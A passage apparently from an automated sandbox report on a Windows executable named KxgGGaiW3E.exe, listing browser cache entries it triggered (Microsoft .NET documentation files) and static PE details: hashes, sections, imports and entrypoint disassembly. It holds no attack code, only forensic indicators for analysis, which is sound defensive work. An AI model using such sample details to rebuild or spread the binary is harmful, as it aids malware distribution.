diagnostics"},{"biName":"3-migrate-from-dotnet-framework","href":"/dotnet/navigate/migration-guide/","kind":"link","title":"Migrate from .NET Framework"},{"biName":"4-compatibility","href":"/dotnet/core/compatibilit

Chrome Cache Entry: 138

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 139

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18320, version 1.0
Category:	downloaded
Size (bytes):	18320
Entropy (8bit):	7.987743324424954
Encrypted:	false
SSDEEP:	384:M/4x9swMer+iBfrWC0iXUr4YESDWwoqh/bNirBh40LqGncCoLm6ECD:M/4x9aLiBjP0Mq4YESDWwo4q4nGncFiE
MD5:	9D54AEA8133FC8CC3DCAE9ECAFF9EF95
SHA1:	E9EB3E8F79B2AE8F096A2079F9FA5CDE72878B13
SHA-256:	43D0F83450A823F30B31DDAA4BF709EFBD6091AC7F0669ADA5533D989CB0CF01
SHA-512:	2166D2D341F2A7F9B9B47F9977B00B0CC7AE933140CFCAD11A081E5E67A469D81B0AE7FEB727E8D91A48B1631C5934EAEBDA9A8CAA0CFFD524DC9CC73824BA4A
Malicious:	false
URL:	https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.c4a596dd.woff2
Preview:	wOF2......G...........G>.........................T.V..f...L..x.6.$..X..n.. ..y..?..wu...8.0_.(....rJX....$'c.0a.eY..EgKt.}.H.!..3q%.~...8..F.ib:D..D..)............J.....z..L}.`..)..l5x..t M.\KBf.....P...\|../.J.I...?....fN..6...1......(...w.?D.y...y ..0...v.....QQ.@@E.".q...............l.U.]N.gq..Z...3......Nd....:.@...zi.&......R......,...s..W....l...h....mAI.......4.....aa.yP.a(.f..r}..w`.S.V.y......U.D...0..3.u...2.F.f.n!..A8.....k.e.V.}....\|./@.P..J..........[..=}..*f..$...7._..g.r..N..V\|s.4..`x.....\|.......<.i...a.....y.A.....\|.@.........aCJ.V......\| h...Y...0..".......(.)...%...H..l......H.X?..5......f5...l...6e.c.S..j.+.....<...X-...tL4x.=...S/...w........v.!..".4.o...dN..v...)>P.A..\|..mI.h.(.......Vr...s...........@.......\|8d..s6...T!...7.K...&......~$S@....T3P...\.j.I.:..6....C_..$.....}.....@....&&..)I.b.....E\..Q..M..Fw.>..{N\|.}..^.......5/.^F..}EyU........10f\|.y3........{......wG....{.....O>.>.}....S..{.....7../././.I4.'.r!.L.o...&7MNB..r

Chrome Cache Entry: 140

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/logos/logo_net.svg
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 141

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (31341), with no line terminators
Category:	downloaded
Size (bytes):	31341
Entropy (8bit):	4.892781786468702
Encrypted:	false
SSDEEP:	384:FGvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdDw:whOEO8chkMet7pCjBfFw
MD5:	40998D414F58B4779CB09C4FD275B92E
SHA1:	5D91AAF653083BD6A569852C0E62341F4F313655
SHA-256:	DD7F4EDCF142A2D2A22E386A7F3A7255B018B71300B53BEFA44C157164FFE5DC
SHA-512:	5BD7B3D4A3B141C315908E9BD7219927C4BD733A3835772BDA6DB3CD78B3D99CA268BC16DBD44EF4228FAC311FE02C429C6CFFC76F576F489A3486F1DEF9B0E7
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/toc.json
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/the-net-framework-and-out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"}],"toc_title":"By OS version"},{"href":"install/repair","toc_title":"Repair .NET f

Chrome Cache Entry: 142

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 143

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 144

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4945
Entropy (8bit):	4.796097221456048
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dptAdSlkepQnymoLByzVqrpCvJ4QG62HxpJjJ+do88HxbqK:dgQ+KfZcbhaWjptAdSlkepQnNgByz8FB
MD5:	EF6E83E1C6E863A122281F71DD8020B4
SHA1:	CEA054B197D99548088012C2E011F3BA5DB8CE60
SHA-256:	B22DAC9B489D9184B1FFE6A4981CAE6C350557D2E7B3378FED8B2A20D41DEB70
SHA-512:	8C69422E55648BC875937D5A51B6D9E76A3019A8147E44D7BA29811772950A06A7A86EDB73319C91D27EB9E561565298977E295E5486770B76007DF108EE4D27
Malicious:	false
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-migrate-from-dotnet-framework","href":"/dotnet/navigate/migration-guide/","kind":"link","title":"Migrate from .NET Framework"},{"biName":"4-compatibility","href":"/dotnet/core/compatibilit

Chrome Cache Entry: 145

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1300 x 300, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	81913
Entropy (8bit):	7.909044687847068
Encrypted:	false
SSDEEP:	1536:dKVqOVA4kDFNEgVzMoz1Olnr8AN5yl7UWBrZtLbqO0vPU9dADS/5een:au5DFj4ozot8AO9UWBDqOYPWB/5eq
MD5:	049412F03408193F0103637411B42627
SHA1:	540DA51436D5A9E305BB113FD522B91448348813
SHA-256:	BA778D4F93DBB62ED50333A967DBC34BB1FD5C9B45ED90B7366D72BD6A2955DB
SHA-512:	90F11094E997CBFA3593FE6A365B0D942EE03EAA9512AB73C0B6D7CAE409F7E0B2B15118944FB4DC113169F2BA900EBBCE9BEC8EE34C3832C5579F217B784AED
Malicious:	false
Preview:	.PNG........IHDR.......,......^......zTXtRaw profile type exif..x.mPA.. ...>...<..L.......;......n.T....5t..Qw.......c#X3;...=r....3..>..U...u..D$.2..<:...F.FLQ(i..[.L.....gh,.$:..._\|z...0....E.<..w..L.~.....#Ci...7..../.YMO.......iCCPICC profile..x.}.=H.@.._S."..v..:Y..q...Bi+..`r..4iHR\......U..g].\.A.....I.EJ._Rh...q?..{...f..f...j..N..\~U....B.@..L=.Y..s\|.......>...T.&.\|".....x.xf..9...YYR..... .#.e..8...xf.....b....feC%.&..F.B.e...g.Zg.{.....J..4#H`.I. BF..Ta!F.F..4..=.#.?E..\.0r,...........I7)..z_l.c......m...v...?.WZ._k....7:Z...m....M...w..']2$G....E....).....kno.}.>.Y.j..88..J.........=......r.......viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 4.4.0-Exiv2">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/Resourc

Chrome Cache Entry: 146

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (516), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	50914
Entropy (8bit):	5.037863422143001
Encrypted:	false
SSDEEP:	768:qYSvuF/zjif/8/60dCkNmPFw1Yn4/1VgMNF5F3/3eYxvlU/B:qp8/fif/U60dCksPFwO4/4yzRvhxNUJ
MD5:	91A8B7ADDC40AEB74B72B78B05928F25
SHA1:	9935B37E79D64B44B8B4544CBBA68F27770E4DD9
SHA-256:	29CF4EF382926E821DF99FFD5AA43A9AA5E6B337636603A83079D2C5DAB1BBC3
SHA-512:	41B75BB40BF45FFE25BBCA216A5B54DC13D00C0C22A46F7DB72049C0891B331C919E314A3E9E2E8B5418A8B96D9B47F743DACE81157DD7B88F76C04A3EE17A6D
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Preview:	<!DOCTYPE html>................................................................................................................<html...class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"...lang="en-us"...dir="ltr"...data-authenticated="false"...data-auth-status-determined="false"...data-target="docs"...x-ms-format-detection="none">....<head>...<meta charset="utf-8" />...<meta name="viewport" content="width=device-width, initial-scale=1.0" />...<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />...<meta property="og:type" content="website" />...<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" />.....<meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." />.....<meta property="og:image" content="https://learn.micr

Chrome Cache Entry: 147

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65409)
Category:	downloaded
Size (bytes):	185160
Entropy (8bit):	5.416088073921403
Encrypted:	false
SSDEEP:	3072:qr01mHNlmzFJALnfgl6KqMeuBDnQgUlzBTIxkLEq:S01ArI2IIMeuDnQzU+Yq
MD5:	B6C6F82EAC50F30FFCC090FA845F53F0
SHA1:	1B84A3B53A340BA59171800DF683D15418DD09D3
SHA-256:	7D960385011DDFE6CC859E56D4302DEDA71FDB2D90655E907C14E77D2DCBC8A5
SHA-512:	96CB5C8177D963CCCC0BD8E026B55BD990DD2784687B703DE61C663E16703892E33A0B84B714252F7361DFC8FA4D1D2CF0AA2F8A4F3EB27DB8BDBA4A52DFE4FB
Malicious:	false
URL:	https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js
Preview:	/!. 1DS JSLL SKU, 3.2.17. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,n=typeof globalThis!=n?globalThis:e\|\|self,i={},e="__ms$mod__",a={},o=a.esm_ms_jsll_3_2_17={},s="3.2.17",c="oneDS3",u=(u=n)[c]=u[c]\|\|{},l=(l=n)[c="oneDS"]=l[c]\|\|{},n=u[e]=u[e]\|\|{},f=n.v=n.v\|\|[],c=l[e]=l[e]\|\|{},d=c.v=c.v\|\|[];for(r in(c.o=c.o\|\|[]).push(a),t(i),i)u[r]=i[r],f[r]=s,l[r]=i[r],d[r]=s,(o.n=o.n\|\|[]).push(r)}}(this,function(u){"use strict";!function(e,t,n){var r=Object.defineProperty;if(r)try{return r(e,t,n)}catch(i){}typeof n.value!==undefined&&(e[t]=n.value)}(u,"__esModule",{value:!0});var l="function",f="object",fe="undefined",j="prototype",d="hasOwnProperty",g=Object,m=g[j],y=g.assign,C=g.create,e=g.defineProperty,E=m[d],b=null;function K(e){e=!1===(e=void 0===e\|\|e)?null:b;return e\|\|((

Chrome Cache Entry: 148

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	2574
Entropy (8bit):	4.80598049257081
Encrypted:	false
SSDEEP:	48:YWuel64qAq3DJJWuO6Z3Db8VgK/ni47ttbFSlA37ERw7II77Aj5M1:PvqAWDzO5tRNEYIOEjc
MD5:	B446C5E0EE48273D54D308DDD35F954A
SHA1:	AF12E4273BE6F0A860589CE36E08920BD2C8CAC2
SHA-256:	7A0A2780A1A8977683EF113DEA438AB2ECA1B99DA9CF67854662D51E08E6BF15
SHA-512:	8C1CCEC779CA25B8678079CC7C88890C718330F64C55437C7AC1107EE5F81D1117763667B840C59AD6BE9F1ECB367AC3B1E4EEE775A2E43C88F6317EE6892FE7
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire (Preview)"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/index","href":"/dotnet/architecture/modern-web-apps-azure/","toc_title":"Modern ASP.NET web applications e-book"},{"homepage":"/dotnet/architecture/microservices/index","href":"/dotnet/architecture/microservices/","toc_title":".NET microservices - Architecture e-book"},{"homepage":"/dotnet/architecture/cloud-native/index","href":"/dotnet/architecture/cloud-native/","toc_title":"Cloud native"},{"homepage":"/dotnet/architecture/blazor-for-web-forms-developers/index","href":"/dotnet/architecture/blazor-for-web-forms-developers/","toc_title":"Blazor for

Chrome Cache Entry: 149

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	7.504250528691307
TrID:	Win64 Executable Console Net Framework (206006/5) 48.58% Win64 Executable Console (202006/5) 47.64% Win64 Executable (generic) (12005/4) 2.83% Generic Win/DOS Executable (2004/3) 0.47% DOS Executable Generic (2002/1) 0.47%
File name:	KxgGGaiW3E.exe
File size:	6'679'218 bytes
MD5:	eb0beafcb365cd20eb00ff9e19b73232
SHA1:	1a4470109418e1110588d52851e320ecefcba7de
SHA256:	31b494be325fc9c97031135886454b1370e5e3608c757f74784c6b6fb2fb5c99
SHA512:	8dff151e81b5ce3c4f51b1f24a6e7654c3008d81b6652e6d2f7fabc42d341e9db703b12f83ccf9471514498af3c1763ef97f132ad36302de8ccd984fbf52d52f
SSDEEP:	98304:DpgFmZKkYcZ4YSQrKF78eHm8Xdt6Zz55JJ9enfr:uFmZOcZtrKFFHm8t0NJJo
TLSH:	F366E01AE7D805D5E56BC630CA2AC732D671F8970735974B052BC3492F73AA28F7B221
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..,=...=...=...;4.~1...;4.~,...;4.~....4.e.3...v..~6...=...)...W4.~6...W4.~x...=...?...W4.~<...W4..<...W4.~<...Rich=..........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14006aae0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6626D781 [Mon Apr 22 21:32:49 2024 UTC]
TLS Callbacks:	0x4006aaf4, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d4e6049ebe9b9b358b43e39f88c5de46

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F16E8CB6AFCh
dec eax
add esp, 28h
jmp 00007F16E8CB62A7h
int3
int3
cmp edx, 02h
jne 00007F16E8CB6492h
dec eax
mov dword ptr [esp+08h], ebx
push edi
dec eax
sub esp, 20h
mov ecx, dword ptr [002B9A47h]
dec eax
mov eax, dword ptr [00000058h]
inc ecx
mov eax, 00000100h
dec eax
mov edx, dword ptr [eax+ecx*8]
inc edx
cmp byte ptr [edx+eax], 00000001h
je 00007F16E8CB645Eh
inc edx
mov byte ptr [edx+eax], 00000001h
dec eax
lea ebx, dword ptr [00158DC9h]
dec eax
lea edi, dword ptr [00158DC2h]
jmp 00007F16E8CB6444h
dec eax
mov eax, dword ptr [ebx]
dec eax
test eax, eax
je 00007F16E8CB6438h
call dword ptr [00158CEAh]
dec eax
add ebx, 08h
dec eax
cmp ebx, edi
jne 00007F16E8CB641Bh
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
add esp, 20h
pop edi
ret
int3
int3
inc ebp
xor eax, eax
xor ecx, ecx
inc ecx
lea edx, dword ptr [eax+02h]
jmp 00007F16E8CB63BFh
int3
int3
jmp 00007F16E8CB6E00h
int3
int3
int3
dec eax
sub esp, 28h
call 00007F16E8CB64F8h
jmp 00007F16E8CB6434h
xor eax, eax
dec eax
add esp, 28h
ret
int3
int3
jmp 00007F16E8CB641Ch
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F16E8CB6442h
mov eax, 00000001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2f0e10	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f0e68	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x343000	0x944	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x325000	0x1c848	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x344000	0x10454	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2a3f60	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a4100	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2a3e20	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1c3000	0x820	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x74698	0x74800	cac71605456e1a43d3ba97c8e6f58e8c	False	0.4502015993830472	data	6.634071999179188	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed	0x76000	0x14c1a8	0x14c200	942e5d2c4c96cd1ae3af54488cc4dd8b	False	0.45930560782837787	data	6.443880945440034	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1c3000	0x12fba6	0x12fc00	f3cd17d360deca436f2bc78d41ae6f28	False	0.4006767618312757	data	6.014930970827861	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2f3000	0x31cb8	0x22e00	2c443c5bff25ef05e119c101ca8dc734	False	0.21290462589605735	data	3.6380217784849584	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x325000	0x1c848	0x1ca00	36a91684145b848ef7654c79ec4cae1c	False	0.4878462745633188	data	6.273034451297544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x342000	0x1f4	0x200	c15642b73c8d62b05be8e3c48cedf8dd	False	0.521484375	data	4.206409585566247	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x343000	0x944	0xa00	31e43e169ddf5acfd3e657a232990ce9	False	0.305078125	data	4.386058263658606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x344000	0x10454	0x10600	8090522f7155be960b9574ea84328c4f	False	0.22182132633587787	data	5.449388858196994	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x3430b8	0x350	data			0.5070754716981132
RT_VERSION	0x343408	0x350	data	English	United States	0.5094339622641509
RT_MANIFEST	0x343758	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
